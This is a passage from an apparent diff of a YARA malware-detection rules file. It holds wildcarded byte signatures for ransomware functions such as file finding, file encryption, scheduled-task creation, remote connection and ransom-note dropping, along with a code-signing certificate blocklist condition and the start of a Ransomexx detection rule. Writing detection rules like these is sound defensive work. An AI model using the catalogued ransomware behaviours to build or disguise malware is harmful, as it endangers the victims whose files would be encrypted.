?? ?? ?? ?? FF B5 ?? ?? + ?? ?? A5 A5 A4 8B 35 ?? ?? ?? ?? FF D6 89 85 ?? ?? ?? ?? 33 C0 50 68 ?? ?? ?? ?? 6A + ?? 50 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 + ?? FF D6 8B 3D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 + C0 75 ?? FF D6 6A ?? FF B5 ?? ?? ?? ?? FF D7 6A ?? 6A ?? 53 FF B5 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 85 C0 75 ?? FF D6 8D 85 ?? ?? ?? ?? 33 DB 50 53 FF B5 ?? ?? ?? ?? 68 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 53 FF B5 ?? ?? ?? ?? + FF D7 6A ?? 8D 45 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 53 8B 9D ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B + 0D ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? ?? ?? 66 89 4D ?? 8D 4D + ?? 89 85 ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 6A ?? 50 2B CA 8D 45 ?? 51 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 33 C0 50 50 + } + $encrypt_files_v1_p2 = { + 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 D2 42 3B C2 75 ?? 83 BD ?? ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 33 D2 42 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 8D + ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 89 8D ?? ?? ?? ?? 0F 44 C2 8D + 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 8D 4D ?? 51 6A ?? 50 6A ?? FF B5 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 83 A5 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF B5 ?? + ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 6A ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? + 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 FF B5 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 8B 85 ?? ?? ?? + ?? 50 FF D6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F + 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $find_files_v1_p1 = { + FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 0F 57 C0 C6 45 + ?? ?? 6A ?? 6A ?? 0F 11 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 + C0 74 ?? 89 18 89 58 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 08 8B 3D ?? ?? ?? ?? + 8B B5 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F + 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF + D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 + C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D + } + $find_files_v1_p2 = { + 8B 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? + ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B B5 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 56 8D 4D ?? E8 ?? ?? ?? + ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? + ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 + B8 ?? ?? ?? ?? C3 C7 45 ?? ?? ?? ?? ?? 33 DB 8B 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 8D + } + $create_scheduled_task_v1 = { + FF 15 ?? ?? ?? ?? 33 FF 85 C0 74 ?? 8B CF 8A 84 0D ?? ?? ?? ?? 88 84 0D ?? ?? ?? ?? + 41 84 C0 75 ?? 8D BD ?? ?? ?? ?? 4F 8A 47 ?? 47 84 C0 75 ?? BE ?? ?? ?? ?? A5 A5 66 + A5 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 8B 4B ?? 8B F0 89 BD ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8D 85 ?? + ?? ?? ?? 2B CA 50 51 FF 73 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B + F2 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 + E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 41 84 C0 75 ?? 66 A1 + ?? ?? ?? ?? 33 DB 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 66 89 01 A0 ?? ?? ?? ?? 53 53 88 + 41 ?? 8D 85 ?? ?? ?? ?? 50 57 53 53 FF D6 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 53 68 + ?? ?? ?? ?? 57 53 53 FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_connection_v1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B + 5D ?? 8D 44 24 ?? 56 57 8B 7D ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A + ?? 6A ?? 6A ?? 58 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 6A ?? 58 53 66 89 44 24 + ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 + ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B CF 8D 51 ?? 8A 01 41 84 C0 75 ?? + 6A ?? 2B CA 51 57 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $check_mutex_v1 = { + E8 ?? ?? ?? ?? 59 59 56 C6 45 ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 50 FF B5 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 57 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 59 FF 77 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 56 FF D3 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? + 56 FF 15 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 94 C0 85 FF 74 ?? 84 + C0 74 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 + } + $find_files_v2 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 83 EC ?? 53 + 56 57 89 65 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 + ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D + ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? + ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? + 3B 45 ?? 0F 87 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? + 51 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 + ?? 72 ?? 6A ?? 40 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 56 + 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B + 7D ?? 33 F6 8B 5D ?? 83 FE ?? 73 ?? 8B 0C B5 ?? ?? ?? ?? 8D 45 ?? 83 FF ?? 0F 43 C3 + 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 46 EB ?? 8D 4D ?? E8 ?? ?? + ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 8B 4D ?? 32 C0 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45 + } + $encrypt_files_v2_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 51 B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? 8B F1 8B 7D ?? 8D 4D ?? 89 65 ?? + 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 8B CE 50 E8 + ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? + ?? ?? 83 C4 ?? 56 53 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 + 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0 + 75 ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 08 89 ?? ?? ?? ?? 4E 00 6A ?? 6A ?? 89 41 ?? + A1 ?? ?? ?? ?? ?? ?? ?? ?? 08 A0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 88 + 41 ?? FF D6 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 15 ?? ?? + ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 ?? FF D6 8B 1D ?? ?? ?? ?? 6A ?? FF 75 ?? FF D3 EB + ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? + ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 6A ?? 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? + 85 C0 75 ?? FF D6 8D 45 ?? 50 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? + ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 + } + $encrypt_files_v2_p2 = { + E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? 33 DB 89 5D ?? 56 57 FF + 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? 4E 00 66 89 4D ?? 8D 4D ?? + 89 45 ?? 8D 51 ?? 89 5D ?? 8A 01 41 84 C0 75 ?? 6A ?? 8D 45 ?? 2B CA 50 51 8D 45 ?? + 50 FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF + 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? + ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 03 + F0 33 C9 3B 75 ?? 75 ?? 85 C9 75 ?? 33 DB 83 F8 ?? 0F 95 C3 68 ?? ?? ?? ?? 8D 45 ?? + 50 8D 85 ?? ?? ?? ?? 50 6A ?? 53 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? + 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? + ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 45 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 FF D6 FF 75 ?? FF D6 8B 4D ?? 5F 5E 64 89 0D + ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45 + } + $remote_connection_v2 = { + 55 8B EC 51 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 + FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? + 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? + 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 57 FF D6 5F 5E + 33 C0 5B 8B E5 5D C3 + } + $drop_ransom_note_v2_p1 = { + 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? + C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? C7 + 40 ?? ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 89 08 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 87 FB 00 00 00 A0 ?? ?? + ?? ?? 88 87 ?? ?? ?? ?? 8B F7 8D 4E ?? 0F 1F 40 ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 + ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 6A ?? 8D 04 + 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 0F 1F 44 00 ?? 8A 06 46 + 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 + 53 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8B F7 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B + D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 33 68 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 + } + $drop_ransom_note_v2_p2 = { + E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 0F 1F 00 8A 06 46 84 C0 75 ?? + 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? + F3 0F 7E 05 ?? ?? ?? ?? 83 C4 ?? 66 0F D6 04 33 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? + 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? + 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 8A 06 46 84 + C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? + ?? ?? ?? 6A ?? 8D 04 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 66 + 90 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? + 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B + CF 5B 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84 C0 75 ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 2B CA 51 + 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 8B E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABADAN PIZZA LTD" and pe.signatures[i].serial=="5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc" and 1563403380<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((( all of ($encrypt_files_v1_p*)) and ( all of ($find_files_v1_p*)) and ($create_scheduled_task_v1) and ($remote_connection_v1) and ($check_mutex_v1)) or (($find_files_v2) and ( all of ($encrypt_files_v2_p*)) and ($remote_connection_v2) and ( all of ($drop_ransom_note_v2_p*)))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0B6D8152F4A06Ba781C6677Eea5Ab74B : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ransomexx : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Ransomexx ransomware." author = "ReversingLabs" - id = "dacac5fe-00dc-5080-a725-9ef69473c45e" - date = "2023-11-08" - modified = "2023-11-08" + id = "5e62660d-2696-56c7-9322-fed6ce9d36ff" + date = "2020-11-26" + modified = "2020-11-26" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3324-L3340" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bd20cf8e4cab2117361dbe05ae2efe813e7f55667b1f3825cd893313d98dcb5f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ransomexx.yara#L1-L147" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "27b4132b7f16cafc40687e96a552ce59cc24ebf7679575680f170e3beee8a0a9" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ransomexx" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B F4 B3 ?? 85 F6 74 ?? C6 46 ?? ?? B0 ?? 66 C7 06 ?? ?? 88 5E ?? 88 + 46 ?? 8B C7 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8B C6 8D 78 ?? 8A 08 40 84 + C9 75 ?? 2B C7 8D 84 10 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 56 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? + ?? 8B F0 89 75 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E 5B 8B E5 + 5D C3 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 89 45 ?? 85 C0 74 ?? C6 40 ?? ?? 88 18 88 + 58 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 49 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 + ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F + 84 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A + } + $find_files_p2 = { + 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? + ?? ?? ?? 8B C7 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 70 ?? + 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 8B 1D ?? ?? ?? ?? 2B C6 8D 94 10 ?? ?? ?? ?? 52 6A + ?? FF D3 50 FF 15 ?? ?? 